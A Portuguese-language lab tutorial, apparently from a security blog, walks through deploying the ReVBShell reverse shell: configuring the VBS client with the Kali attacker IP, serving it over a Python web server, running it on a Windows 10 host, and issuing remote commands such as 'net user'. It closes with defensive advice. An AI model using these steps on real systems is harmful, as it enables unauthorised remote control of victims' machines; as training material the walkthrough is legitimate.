O ReVBShell é um projeto que disponibiliza um script Server desenvolvido em Python e um script Client desenvolvido em VBS que permite a execução de comandos remotamente.

Atenção :
Certifique-se que o AntiVírus e AntiSpam que você administra em sua empresa não permita a execução/recebimento de Script e Ferramentas que possam contribuir com o processo de exploração (ex: PowerShell, VBS, PSTools, etc.), seja restritivo para evitar que um usuário possa clicar em um Client como este.

Cenário

Server - Kali Linux : 192.168.0.53

Client - Windows 10 : 192.168.0.44

01 - Passo

Realize o download do projeto ReVBShell, em seguida entre no diretório e liste os arquivos.

Linux
git clone https://github.com/bitsadmin/revbshell

cd revbshell/

ls -l

02 - Passo

Confirme o IP que está usando no Kali Linux, em seguida edite o arquivo client.vbs.

Linux
ifconfig | grep "192"

vim client.vbs

03 - Passo

Informe o IP do Server (Kali Linux) na linha StrHost.

Linux
StrHost = "192.168.0.53"

04 - Passo

Você pode enviar o arquivo client.vbs para o Windows de diversas formas, mas uma alternativa pode ser iniciando um WebServer via Python.

Linux
python -m SimpleHTTPServer

05 - Passo

No Windows abra o navegador e digite o IP do Server (Kali Linux) seguido da porta 8000.

http://192.168.0.53:8000

06 - Passo

Realize o download e execute o script client.vbs.


Script client.vbs em execução :

07 - Passo

Execute o script server.py.

python server.py
>

08 - Passo

Digite os comandos em letras MAIÚSCULAS, se precisar de ajuda digite HELP.

> SYSINFO

> IFCONFIG

> SHELL

09 - Passo

Após digitar o comando SHELL você pode digitar os comandos do Windows em letras minúsculas :

SHELL> hostname

SHELL> net user

SHELL> ipconfig

Observações

A exploração pode ser realizada mesmo com as proteções do Windows ativadas.

Dicas

  • Conscientize os Usuários da sua empresa para não clicar em arquivos nos quais a origem é desconhecida.
  • Certifique-se que o AntiVírus esteja devidamente atualizado e se possível com o Firewall Ativado.
  • Revise as configurações do AntiSpam para não permitir que os usuários recebam mensagem com Scripts.


  Autor

Marcos Henrique

 São Paulo/SP



  Ferramentas de Exploração

© 2020 - 100SECURITY

Contato